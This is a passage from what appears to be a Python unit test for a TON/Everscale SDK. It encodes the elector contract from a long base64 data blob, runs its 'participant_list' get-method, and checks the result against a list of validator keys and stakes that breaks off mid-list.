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'
state_init = StateInitSource.StateInit(
code=elector_code, data=elector_data)
encode_params = ParamsOfEncodeAccount(state_init=state_init)
elector = async_core_client.abi.encode_account(params=encode_params)
run_params = ParamsOfRunGet(
account=elector.account, function_name='participant_list')
result = async_core_client.tvm.run_get(params=run_params)
self.assertEqual(
json.loads(
'[[["0x0101b6d65a384b9c70deb49fd6c43ffc0f60ed22fcc3a4966f7043794a749228","60138000000000"],[["0x03de5d8590fe6ad191bf94d4136dfb630e9b3447bb2f1a6ae2d8e3e4cbee1d9f","61000000000000"],[["0x0558f90c0682d677b46005ce2e04206c255ea9a05bfac0ff5aea9d7182a28913","60138000000000"],[["0x07698228973a595751d79e1fafd5a4145b3d35349bf0b43322afb61b138f01eb","60138000000000"],[["0x09d1ef8a40a9fbf1ca505f072258048ec15e0637baa085649d77b9a90220003e","60138000000000"],[["0x0ac21ef27c8ed4487270f1c45e99dac091ca4007951217ece344452df7047e5a","60138000000000"],[["0x0aed529418ab67a31a4b98c224f8fdb2fec11f0100c23751e67b312cba11fb23","60138000000000"],[["0x0bd14cdade9067c523f44fd208dee5daa7d852151725d713b92c840a031018a6","60138000000000"],[["0x0bddff0d98f42a3155e577a5579623a911e3b03401835166553f88375cbd9657","60138000000000"],[["0x12893bbd649bf2e1e79cb084025638cdd7906eebca40efeee7fdbd548cc96391","60138000000000"],[["0x15546bc7b5124f6d83d6c5a62b8890a48b933168e141c01229431a6c0c499780","60138000000000"],[["0x1cbea6a399ba200958db255579cda2195006f3a3108b2d6ef7e258e42c101479","60138000000000"],[["0x1f8ee6ba2902715804c769c3845b6b3a37802e462e8df63ba19f827a92dbbda0","60138000000000"],[["0x1fdd556d84d1d9f24a739c2600ec72256cc00920d85ad3a2edb3e0d72146789d","60138000000000"],[["0x20f20c2cfa4d72afb9c5f64d4735070962b3323b3629892c75f56427f175ebe4","60138000000000"],[["0x219d32737b0f3769869b8fa750ba8e3cd9f19b21a4d669c7c79d420d7f7cdb24","60138000000000"],[["0x2615b4aeb69140531228248a9d84593117b64e22d462e3968e39c1840a260523","60138000000000"],[["0x26984c9f04bc1889061e98bd9caf6955f750219d8e8dbc0986feb9d770e5a15b","60138000000000"],[["0x28bb07d80e20aa624ae47dfe53f915b23a666bf825ff283bac06c14bea1eaa74","60138000000000"],[["0x2a23566008fd4f87105b09d02c739452e45187fbada5e7e52ada356264cd6751","60138000000000"],[["0x2dcc70859876106b21b598ba9a10c9932259c36f44adeb95a178e67f6afd2f7a","60138000000000"],[["0x30b854226ef943d738d2dfcc72ede3b39d08604ca7211abf3c76f488441c77fc","60138000000000"],[["0x31bb74a5a53769d3db789d961375ea569d4da0bd6ac2b12f830dd6be81968ef1","60138000000000"],[["0x334f22e0de2e24a070fec7c1d77d7a988a79d66b79e2d654310a963964edd337","60138000000000"],[["0x36c44eddf773390cdb42f93f8454ea9c7ca45aa8948346df8f642a59ce44c442","60138000000000"],[["0x3d29d2b5ceef46703255ce8cfe3aad3c4fefd3a2025e5a48ce78a63f20887eff","60138000000000"],[["0x41b047a20ed691e9376f7f2f60d6571290e34ef4e1b85467dcc3d7c0cf7fae90","60138000000000"],[["0x41e7541c377b58a0cfc4ca954731e971f6dc9fa6806eaa1709d011d3d32593ce","60138000000000"],[["0x426a52d3b3d016451c46b3a0eacb382fbbb38739e00d041d4038f795a54e25b5","60138000000000"],[["0x42f89915ca540af691f623f201b616caa7f5e104f8293698f8b46c4e7bb5b292","60138000000000"],[["0x4449521e793b02b036ce698c3af951e9548cd5b862b704fa5cc9e80b171a3c61","60138000000000"],[["0x492f4fee6a035a09e9ff09d65a65768899b04797cff08dc2c64ae11cd94d1968","60138000000000"],[["0x4947018f9c0c9302b2783eb5edacb76ccae3b5c5a2f6355b5b51afd1a18075f8","60138000000000"],[["0x4c27708e4ce81a0bbeb315ece024ba495f3e3fab5f83a2941b7731a58ad32160","60138000000000"],[["0x5059d40f80f578c3c384239415f54af35ab4dbdea0251618d4c3c7b4937e7e69","60138000000000"],[["0x5191f8cbfe1ce25a68c337ede75638321374112b868584092a335f83caad59a4","60138000000000"],[["0x531296c32ea64d09dcb44ff0b99843dc9855143c70b9fad42deb33881525fb84","60138000000000"],[["0x54c9860aa34ddba2a16e4f4271e1771f6